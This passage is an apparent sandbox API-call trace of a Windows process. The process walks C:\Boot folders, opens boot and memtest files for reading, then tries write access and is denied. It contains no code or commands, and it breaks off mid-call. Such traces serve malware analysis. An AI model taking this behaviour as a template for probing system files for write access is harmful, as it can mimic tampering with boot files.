[0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.279] AreFileApisANSI () returned 1 [0070.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\memtest.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\memtest.exe", lpUsedDefaultChar=0x0) returned 20 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.280] AreFileApisANSI () returned 1 [0070.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0070.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac38 [0070.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\memtest.exe") returned 20 [0070.280] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0070.280] GetFileType (hFile=0x410) returned 0x1 [0070.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0070.280] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.423] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.423] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.423] CloseHandle (hObject=0x410) returned 1 [0070.424] AreFileApisANSI () returned 1 [0070.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0070.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a818 [0070.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x7a818, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\memtest.exe") returned 20 [0070.424] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.424] GetLastError () returned 0x5 [0070.424] GetLastError () returned 0x5 [0070.424] SetLastError (dwErrCode=0x5) [0070.424] GetLastError () returned 0x5 [0070.424] SetLastError (dwErrCode=0x5) [0070.424] GetLastError () returned 0x5 [0070.424] SetLastError (dwErrCode=0x5) [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a818 | out: hHeap=0x20000) returned 1 [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.424] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0070.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.425] AreFileApisANSI () returned 1 [0070.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO", lpUsedDefaultChar=0x0) returned 14 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.425] AreFileApisANSI () returned 1 [0070.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88450 [0070.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88450, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nb-NO") returned 14 [0070.425] CreateFileW (lpFileName="C:\\Boot\\nb-NO" (normalized: "c:\\boot\\nb-no"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.425] GetLastError () returned 0x5 [0070.425] GetLastError () returned 0x5 [0070.425] SetLastError (dwErrCode=0x5) [0070.425] GetLastError () returned 0x5 [0070.426] SetLastError (dwErrCode=0x5) [0070.426] GetLastError () returned 0x5 [0070.426] SetLastError (dwErrCode=0x5) [0070.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.426] AreFileApisANSI () returned 1 [0070.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0070.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nb-NO") returned 14 [0070.426] CreateFileW (lpFileName="C:\\Boot\\nb-NO" (normalized: "c:\\boot\\nb-no"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.426] GetLastError () returned 0x5 [0070.426] GetLastError () returned 0x5 [0070.426] SetLastError (dwErrCode=0x5) [0070.426] GetLastError () returned 0x5 [0070.426] SetLastError (dwErrCode=0x5) [0070.426] GetLastError () returned 0x5 [0070.426] SetLastError (dwErrCode=0x5) [0070.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.426] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0070.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.427] FindFirstFileExW (in: lpFileName="C:\\Boot\\nb-NO\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78710 [0070.427] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.427] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.428] AreFileApisANSI () returned 1 [0070.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.429] AreFileApisANSI () returned 1 [0070.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0070.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0070.429] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.429] GetFileType (hFile=0x41c) returned 0x1 [0070.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.429] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.429] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.430] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.430] CloseHandle (hObject=0x41c) returned 1 [0070.430] AreFileApisANSI () returned 1 [0070.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 30 [0070.430] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.430] GetLastError () returned 0x5 [0070.430] GetLastError () returned 0x5 [0070.430] SetLastError (dwErrCode=0x5) [0070.430] GetLastError () returned 0x5 [0070.430] SetLastError (dwErrCode=0x5) [0070.430] GetLastError () returned 0x5 [0070.430] SetLastError (dwErrCode=0x5) [0070.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.430] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.431] AreFileApisANSI () returned 1 [0070.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, 